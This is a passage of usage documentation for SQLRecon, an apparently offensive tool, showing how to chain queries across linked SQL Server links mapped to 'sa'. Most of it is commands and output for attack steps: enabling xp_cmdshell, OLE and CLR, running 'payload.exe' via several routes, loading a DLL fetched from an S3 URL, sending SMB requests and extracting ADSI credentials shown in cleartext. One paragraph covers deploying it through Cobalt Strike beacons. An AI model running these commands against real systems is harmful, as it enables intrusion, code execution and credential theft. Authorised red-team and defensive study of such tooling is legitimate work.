6. Linked Chain Modules
Linked chain modules are executed on the final server in a chain of linked SQL servers. The module's query is wrapped in one OPENQUERY per hop, so each intermediate server forwards it to the next link under whatever login that link maps to, not under the login you connected with.
We use the links module to demonstrate that SQL01 has a link to SQL02.
> SQLRecon.exe /a:WinToken /h:SQL01 /m:links
[*] Executing the 'links' module on SQL01
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ---------- | -------- | ----------- | ----------- | --------------- | ------------ |
| SQL02 | SQL Server | SQLNCLI | SQL02 | N/A | | |
| SQL03 | SQL Server | SQLNCLI | SQL03 | N/A | | |
We then use the links module with SQL02 set as a linked SQL server, and see that SQL02 has a link to SQL03. Note the Remote Login column: the link is mapped to `sa` with self mapping disabled, so anything forwarded over it runs on SQL03 as `sa`, regardless of the caller's own rights on SQL01 or SQL02.
> SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:links
[*] Executing the 'links' on SQL02 via SQL01
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ---------- | -------- | ----------- | ----------- | --------------- | ------------ |
| SQL03 | SQL Server | SQLNCLI | SQL03 | N/A | False | sa |
We can then use the `/chain` flag to identify whether SQL03 has any links. To do this, we need to specify the chained execution path, which will be `/l:SQL02,SQL03`. The links module will be executed on SQL03, as it is the final server in the list.
> SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /m:links /chain
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'links' module on SQL03
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ----------------------------------- | ------------ | ------------------- | ----------- | --------------- | -------------- |
| LINKADSI | Active Directory Service Interfaces | ADsDSOObject | dc01.kawalabs.local | N/A | False | kawalabs\admin |
| MECM01 | SQL Server | SQLNCLI | MECM01 | N/A | False | sa |
We can now see that SQL03 has a link to MECM01, again mapped to the remote login `sa` with self mapping disabled, so queries forwarded over it execute on MECM01 as `sa` (the `whoami` output further down confirms this). If we want to execute a module on MECM01, all we have to do is append MECM01 to the link chain. In the example below, an initial connection is made to SQL01, and a chain is created to tunnel SQL queries through SQL02 and SQL03 before finally executing the desired module on MECM01.
> SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /m:enableclr /chain
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'enableclr' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 1 | 1 | CLR user code execution enabled in the server |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:info
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'info' module on MECM01
| Object | Value |
| ------------------------- | ------------------------------------- |
| ComputerName | MECM01 |
| DomainName | KAWALABS |
| ServicePid | 2496 |
| rpc_OsMachineType | ServerNT |
| rpc_OsVersion | Windows Server 2022 Standard |
| SqlServerServiceName | MSSQLSERVER |
| rpc_SqlServiceAccountName | KAWALABS\mssql_svc |
| rpc_AuthenticationMode | Windows and SQL Server Authentication |
| rpc_ForcedEncryption | 0 |
| Clustered | No |
| SqlVersionNumber | 16.0.1000.6 |
| SqlMajorVersionNumber | 2022 |
| SqlServerEdition | Developer Edition (64-bit) |
| SqlServerServicePack | RTM |
| OsArchitecture | X64 |
| OsVersionNumber | 2022 |
| CurrentLogon | sa |
| ActiveSessions | 3 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:whoami
Expected Output:
[*] Executing the 'whoami' module on MECM01
[*] Logged in as sa
[*] Mapped to the user dbo
[*] Server Permissions:
| permission_name |
| --------------------------------------------- |
| CONNECT SQL |
| SHUTDOWN |
| CREATE ENDPOINT |
| CREATE ANY DATABASE |
| CREATE AVAILABILITY GROUP |
| CREATE LOGIN |
| ALTER ANY LOGIN |
| ALTER ANY CREDENTIAL |
| ALTER ANY ENDPOINT |
| ALTER ANY LINKED SERVER |
| ALTER ANY CONNECTION |
| ALTER ANY DATABASE |
| ALTER RESOURCES |
| ALTER SETTINGS |
| ALTER TRACE |
| ALTER ANY AVAILABILITY GROUP |
| ADMINISTER BULK OPERATIONS |
| AUTHENTICATE SERVER |
| EXTERNAL ACCESS ASSEMBLY |
| VIEW ANY DATABASE |
| VIEW ANY SECURITY DEFINITION |
| VIEW ANY PERFORMANCE DEFINITION |
| VIEW ANY DEFINITION |
| VIEW SERVER SECURITY STATE |
| VIEW SERVER PERFORMANCE STATE |
| VIEW SERVER STATE |
| CREATE DDL EVENT NOTIFICATION |
| CREATE TRACE EVENT NOTIFICATION |
| ALTER ANY EVENT NOTIFICATION |
| ALTER SERVER STATE |
| UNSAFE ASSEMBLY |
| ALTER ANY SERVER AUDIT |
| CREATE SERVER ROLE |
| ALTER ANY SERVER ROLE |
| CREATE ANY EVENT SESSION |
| DROP ANY EVENT SESSION |
| ALTER ANY EVENT SESSION OPTION |
| ALTER ANY EVENT SESSION ADD EVENT |
| ALTER ANY EVENT SESSION DROP EVENT |
| ALTER ANY EVENT SESSION ENABLE |
| ALTER ANY EVENT SESSION DISABLE |
| ALTER ANY EVENT SESSION ADD TARGET |
| ALTER ANY EVENT SESSION DROP TARGET |
| ALTER ANY EVENT SESSION |
| CONNECT ANY DATABASE |
| IMPERSONATE ANY LOGIN |
| SELECT ALL USER SECURABLES |
| VIEW ANY CRYPTOGRAPHICALLY SECURED DEFINITION |
| VIEW ANY ERROR LOG |
| VIEW SERVER SECURITY AUDIT |
| CONTROL SERVER |
[*] Database Access:
| name |
| -------- |
| master |
| tempdb |
| model |
| msdb |
| Payments |
[*] Database Permissions:
| permission_name |
| -------------------------------------------- |
| CREATE TABLE |
| CREATE VIEW |
| CREATE PROCEDURE |
| CREATE FUNCTION |
| CREATE RULE |
| CREATE DEFAULT |
| BACKUP DATABASE |
| BACKUP LOG |
| CREATE DATABASE |
| CREATE TYPE |
| CREATE ASSEMBLY |
| CREATE XML SCHEMA COLLECTION |
| CREATE SCHEMA |
| CREATE SYNONYM |
| CREATE AGGREGATE |
| CREATE ROLE |
| CREATE MESSAGE TYPE |
| CREATE SERVICE |
| CREATE CONTRACT |
| CREATE REMOTE SERVICE BINDING |
| CREATE ROUTE |
| CREATE QUEUE |
| CREATE SYMMETRIC KEY |
| CREATE ASYMMETRIC KEY |
| CREATE EXTERNAL LANGUAGE |
| CREATE EXTERNAL LIBRARY |
| CREATE FULLTEXT CATALOG |
| CREATE CERTIFICATE |
| CREATE DATABASE DDL EVENT NOTIFICATION |
| CREATE USER |
| CONNECT |
| CONNECT REPLICATION |
| CHECKPOINT |
| SUBSCRIBE QUERY NOTIFICATIONS |
| AUTHENTICATE |
| SHOWPLAN |
| ALTER ANY USER |
| ALTER ANY ROLE |
| ALTER ANY APPLICATION ROLE |
| ALTER ANY COLUMN ENCRYPTION KEY |
| ALTER ANY COLUMN MASTER KEY |
| ALTER ANY SCHEMA |
| ALTER ANY ASSEMBLY |
| ALTER ANY DATABASE SCOPED CONFIGURATION |
| ALTER ANY DATASPACE |
| ALTER ANY EXTERNAL DATA SOURCE |
| ALTER ANY EXTERNAL FILE FORMAT |
| ALTER ANY EXTERNAL LIBRARY |
| ALTER ANY EXTERNAL LANGUAGE |
| ALTER ANY EXTERNAL STREAM |
| ALTER ANY EXTERNAL JOB |
| ALTER ANY MESSAGE TYPE |
| ALTER ANY CONTRACT |
| ALTER ANY SERVICE |
| ALTER ANY REMOTE SERVICE BINDING |
| ALTER ANY ROUTE |
| ALTER ANY FULLTEXT CATALOG |
| ALTER ANY SYMMETRIC KEY |
| ALTER ANY ASYMMETRIC KEY |
| ALTER ANY CERTIFICATE |
| ALTER ANY SECURITY POLICY |
| SELECT |
| INSERT |
| UPDATE |
| DELETE |
| REFERENCES |
| EXECUTE |
| ALTER ANY DATABASE DDL TRIGGER |
| ALTER ANY DATABASE EVENT NOTIFICATION |
| ALTER ANY DATABASE AUDIT |
| CREATE ANY DATABASE EVENT SESSION |
| DROP ANY DATABASE EVENT SESSION |
| ALTER ANY DATABASE EVENT SESSION OPTION |
| ALTER ANY DATABASE EVENT SESSION ADD EVENT |
| ALTER ANY DATABASE EVENT SESSION DROP EVENT |
| ALTER ANY DATABASE EVENT SESSION ENABLE |
| ALTER ANY DATABASE EVENT SESSION DISABLE |
| ALTER ANY DATABASE EVENT SESSION ADD TARGET |
| ALTER ANY DATABASE EVENT SESSION DROP TARGET |
| ALTER ANY DATABASE EVENT SESSION |
| KILL DATABASE CONNECTION |
| VIEW ANY COLUMN ENCRYPTION KEY DEFINITION |
| VIEW ANY COLUMN MASTER KEY DEFINITION |
| VIEW DATABASE SECURITY STATE |
| VIEW DATABASE PERFORMANCE STATE |
| VIEW DATABASE STATE |
| VIEW SECURITY DEFINITION |
| VIEW PERFORMANCE DEFINITION |
| VIEW DEFINITION |
| TAKE OWNERSHIP |
| ALTER |
| ALTER ANY MASK |
| UNMASK |
| EXECUTE ANY EXTERNAL SCRIPT |
| ADMINISTER DATABASE BULK OPERATIONS |
| ALTER ANY SENSITIVITY CLASSIFICATION |
| VIEW ANY SENSITIVITY CLASSIFICATION |
| VIEW CRYPTOGRAPHICALLY SECURED DEFINITION |
| ENABLE LEDGER |
| ALTER LEDGER |
| VIEW LEDGER CONTENT |
| EXECUTE ANY EXTERNAL ENDPOINT |
| VIEW DATABASE SECURITY AUDIT |
| ALTER LEDGER CONFIGURATION |
| CONTROL |
[*] Database Roles:
| Role | Membership |
| ----------------- | ---------- |
| public | Yes |
| db_owner | No |
| db_accessadmin | No |
| db_securityadmin | No |
| db_ddladmin | No |
| db_backupoperator | No |
| db_datareader | No |
| db_datawriter | No |
| db_denydatareader | No |
| db_denydatawriter | No |
| sysadmin | Yes |
| setupadmin | Yes |
| serveradmin | Yes |
| securityadmin | Yes |
| processadmin | Yes |
| diskadmin | Yes |
| dbcreator | Yes |
| bulkadmin | Yes |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:users
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'users' module on MECM01
[*] Users in the 'master' database
| username | create_date | modify_date | type | authentication_type |
| ------------------- | ------------------- | ------------------- | ------------ | ------------------- |
| NT AUTHORITY\SYSTEM | 6/7/2023 9:32:08 AM | 6/7/2023 9:32:08 AM | WINDOWS_USER | WINDOWS |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
| name | type_desc | is_disabled | create_date | modify_date |
| ---------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| KAWALABS\JSmith | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| KAWALABS\acon | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| NT AUTHORITY\NETWORK SERVICE | WINDOWS_LOGIN | False | 6/7/2023 9:58:19 AM | 6/7/2023 9:58:19 AM |
| MECM01\ConfigMgr_DViewAccess | WINDOWS_GROUP | False | 6/7/2023 9:37:35 AM | 6/7/2023 9:37:35 AM |
| NT AUTHORITY\SYSTEM | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/7/2023 9:32:08 AM |
| NT SERVICE\SQLTELEMETRY | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLSERVERAGENT | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/6/2023 12:39:59 PM |
| NT SERVICE\MSSQLSERVER | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\Winmgmt | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLWriter | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\Domain Admins | WINDOWS_GROUP | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\mssccm_svc | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:databases
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'databases' module on MECM01
| dbid | name | crdate | filename |
| ---- | ------ | -------------------- | --------------------------------------------------------------------------------- |
| 1 | master | 4/8/2003 9:13:36 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\master.mdf |
| 2 | tempdb | 6/28/2024 7:53:49 PM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\tempdb.mdf |
| 3 | model | 4/8/2003 9:13:36 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\model.mdf |
| 4 | msdb | 10/8/2022 6:31:57 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf |
| 5 | CM_KAW | 6/7/2023 9:23:45 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\CM_KAW.mdf |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:tables /db:master
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'tables' module on SQL03
[*] Tables in 'master'
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE |
| ------------- | ------------ | --------------------- | ---------- |
| master | dbo | spt_fallback_db | BASE TABLE |
| master | dbo | spt_fallback_dev | BASE TABLE |
| master | dbo | spt_fallback_usg | BASE TABLE |
| master | dbo | spt_values | VIEW |
| master | dbo | spt_monitor | BASE TABLE |
| master | dbo | MSreplication_options | BASE TABLE |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:columns /db:master /table:spt_values
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'columns' module on SQL03
[*] Displaying columns from 'spt_values' in ''
| COLUMN_NAME |
| ----------- |
| name |
| number |
| type |
| low |
| high |
| status |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:rows /db:Payments /table:cc
Expected Output:
[*] Executing the 'rows' on SQL02 via SQL01
[*] Displaying number of rows from 'cc' in 'Payments'
| row_count |
| --------- |
| 31 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:rows /db:master /table:spt_values
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'rows' module on SQL03
[*] Displaying number of rows from '' in 'spt_values'
| row_count |
| --------- |
| 2574 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02 /m:query /c:"select @@servername"
Expected Output:
[*] Executing the 'query' module on SQL02 via SQL01
[*] Executing 'select @@servername'
| column0 |
| ------- |
| SQL02 |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:smb /unc:\\172.16.10.21\some-path
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'smb' module on MECM01
[*] Sent SMB request request
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:links
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'links' module on SQL03
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ----------------------------------- | ------------ | ------------------- | ----------- | --------------- | -------------- |
| LINKADSI | Active Directory Service Interfaces | ADsDSOObject | dc01.kawalabs.local | N/A | False | kawalabs\admin |
| MECM01 | SQL Server | SQLNCLI | MECM01 | N/A | False | sa |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:impersonate
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'impersonate' module on SQL03
| User | Can Impersonate? |
| ---- | ---------------- |
| sa | True |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:checkrpc
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'checkrpc' module on SQL03
[*] The following SQL servers can have RPC configured.
| name | is_rpc_out_enabled |
| -------- | ------------------ |
| SQL03 | True |
| LINKADSI | False |
| MECM01 | True |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:disablexp
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'disablexp' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390 | xp_cmdshell | 0 | 0 | Enable or disable command shell |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:enablexp
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'enablexp' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390 | xp_cmdshell | 1 | 1 | Enable or disable command shell |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:disableole
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'disableole' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388 | Ole Automation Procedures | 0 | 0 | Enable or disable Ole Automation Procedures |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:enableole
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'enableole' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388 | Ole Automation Procedures | 1 | 1 | Enable or disable Ole Automation Procedures |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:disableclr
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'disableclr' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 0 | 0 | CLR user code execution enabled in the server |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:enableclr
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'enableclr' module on MECM01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 1 | 1 | CLR user code execution enabled in the server |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:xpcmd /c:'notepad'
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'xpcmd' module on SQL03
Executing 'notepad'
[*] 'notepad' executed.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:olecmd /c:'c:\temp\payload.exe'
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'olecmd' module on SQL03
[*] Executing 'c:\temp\payload.exe'
[*] Setting sp_oacreate to 'DBYIZIqJ'.
[*] Setting sp_oamethod to 'QMnIADXv'.
[+] Executed command. Destroyed 'DBYIZIqJ' and 'QMnIADXv'.
A custom .NET assembly can be supplied to SQLRecon in three ways:
- Local file path
- SMB file path
- HTTP/S URL
Please refer to sql.cs or hollow.cs to see how to build a custom DLL that is compatible with SQL CLR attacks.
If you are looking to supply the DLL using a local file path, please note that the DLL has to reside on the compromised host. For example, if you are using a C2 framework like Cobalt Strike, you will need to:
- Upload `hollow.dll` to the system you have a beacon on.
- Then use `inline-ExecuteAssembly` or `execute-assembly` to execute `SQLRecon`. The location of the DLL on disk should be passed into the `/dll:` flag. The function which you want executed should be passed into the `/function:` flag.
- You can then delete the DLL after the command has run.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:clr /dll:'c:\temp\sql.dll' /function:CustomFunctionName
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'clr' module on SQL03
[*] c:\temp\sql.dll is 3584 bytes.
[+] Added SHA-512 hash for 'c:\temp\sql.dll' as a trusted assembly with a random name of 'WDRVpYYF'.
[+] Loaded DLL into a new custom assembly called 'KEobiyRS'.
[+] Added the 'KEobiyRS' assembly into a new stored procedure called 'CustomFunctionName'.
[*] Executing payload ...
[*] Cleaning up. Deleting assembly 'KEobiyRS', stored procedure 'CustomFunctionName' and trusted assembly hash 'WDRVpYYF'.
You can also supply the location of a DLL to SQLRecon via an HTTP or HTTPS link. In the example below, I've uploaded `sql.dll` to an AWS S3 bucket and created a temporary pre-signed URL.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:clr /dll:"https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>" /function:CustomFunctionName
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'clr' module on SQL03
[+] Downloading DLL from: https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>
[+] DLL is 3584 bytes.
[+] Added SHA-512 hash for 'https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>' as a trusted assembly with a random name of 'pOSvCPBU'.
[+] Loaded DLL into a new custom assembly called 'kTMflwIP'.
[+] Added the 'kTMflwIP' assembly into a new stored procedure called 'CustomFunctionName'.
[+] Executing payload ...
[+] Cleaning up. Deleting assembly 'kTMflwIP', stored procedure 'CustomFunctionName' and trusted assembly hash 'pOSvCPBU'.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:agentstatus
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'agentstatus' module on SQL03
[*] SQL agent is running on SQL03.
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:agentcmd /subsystem:cmdexec /command:'c:\temp\payload.exe'
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'agentcmd' module on SQL03
[*] Executing 'c:\temp\payload.exe' using the 'cmdexec' subsystem.
[*] Setting job_name to 'EeiPqCae'.
[*] Setting step_name to 'vmXVGXui'.
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
| 87eb0e31-b263-49a9-a585-a546cdb7086c | EeiPqCae | 1 | 7/2/2024 8:29:08 AM | 7/2/2024 8:29:08 AM |
[*] Executing job 'EeiPqCae' and waiting for 5 seconds ...
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
[+] Deleting job 'EeiPqCae' on SQL03.
PowerShell is the default Agent Job subsystem.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:agentcmd /c:'c:\temp\payload.exe'
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'agentcmd' module on SQL03
[*] Executing 'c:\temp\payload.exe' using the 'powershell' subsystem.
[*] Setting job_name to 'nGpkSNSj'.
[*] Setting step_name to 'VtapCeyI'.
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
| 2d8903dc-b111-4a70-b854-27dd7f99a466 | nGpkSNSj | 1 | 7/2/2024 8:29:16 AM | 7/2/2024 8:29:16 AM |
[*] Executing job 'nGpkSNSj' and waiting for 5 seconds ...
[*] Agent Jobs on SQL03
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | --------------------- | --------------------- |
| 14f43cd6-62cc-4390-8517-173847103d9a | syspolicy_purge_history | 1 | 5/29/2024 11:43:39 AM | 5/29/2024 11:43:40 AM |
[+] Deleting job 'nGpkSNSj' on SQL03.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03 /chain /m:adsi /adsi:linkadsi /lport:30000
Expected Output:
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03
[*] Executing the 'adsi' module on SQL03
[*] Obtaining ADSI credentials for 'linkadsi'
[+] Added SHA-512 hash for LDAP server assembly to sys.trusted_assemblies with a random name of 'JHAXOsYH'.
[+] Loaded LDAP server assembly into a new custom assembly called 'ldapServer'.
[+] Added the 'ldapServer' assembly into a new stored procedure called 'DlaYGirn'.
[*] Starting a local LDAP server on port 30001.
[*] Executing LDAP solicitation ...
[+] Obtained ADSI link credentials
|-> kawalabs\admin:Password123
[*] Cleaning up. Deleting LDAP server assembly 'ldapServer', stored procedure 'DlaYGirn' and trusted assembly hash 'JHAXOsYH'.
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:users /debug
Expected Output:
[*] Debug mode enabled. No SQL queries will be executed.
[DEBUG] CLI Arguments:
|-> /auth:WinToken
|-> /host:SQL01
|-> /link:SQL02,SQL03,MECM01
|-> /chain:
|-> /module:users
|-> /debug:
[DEBUG] Connecting to 'master' on SQL01:1433 using wintoken.
|-> Connection String: Server=SQL01,1433; Database=master; Integrated Security=True; Connect Timeout=3;
|-> Data Source: SQL01,1433
|-> Database: master
|-> Server Version: 16.00.1000
|-> State: Open
|-> Workstation ID: DESKTOP-LF8Q3C6
|-> Packet Size: 8000
|-> Client Connection ID: 50715307-8d6b-4edc-87ad-c4420804618f
|-> Application Name: DESKTOP-LF8Q3C6
[DEBUG] Module: users
|-> Number of required standard arguments: 0
|-> Number of required impersonate arguments: 1
|-> Number of required linked arguments: 2
[DEBUG] Context Selected: Linked
|-> Module: users
|-> Number of required arguments: 2
[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'users' module on MECM01
[*] Users in the 'master' database
[DEBUG] Query:
|-> SELECT * FROM OPENQUERY("SQL02", 'SELECT * FROM OPENQUERY("SQL03", ''SELECT * FROM OPENQUERY("MECM01", ''''SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN (''''''''A'''''''', ''''''''R'''''''', ''''''''X'''''''') AND sid IS NOT null AND name NOT LIKE ''''''''##%'''''''' ORDER BY modify_date DESC;'''')'')')
[*] Server principals
[DEBUG] Query:
|-> SELECT * FROM OPENQUERY("SQL02", 'SELECT * FROM OPENQUERY("SQL03", ''SELECT * FROM OPENQUERY("MECM01", ''''SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE ''''''''##%'''''''' ORDER BY modify_date DESC;'''')'')')
SQLRecon.exe /a:WinToken /h:SQL01 /l:SQL02,SQL03,MECM01 /chain /m:users /verbose
Expected Output:
[VERBOSE] CLI Arguments:
|-> /auth:WinToken
|-> /host:SQL01
|-> /link:SQL02,SQL03,MECM01
|-> /chain:
|-> /module:users
|-> /verbose:
[VERBOSE] Connecting to 'master' on SQL01:1433 using wintoken.
|-> Connection String: Server=SQL01,1433; Database=master; Integrated Security=True; Connect Timeout=3;
|-> Data Source: SQL01,1433
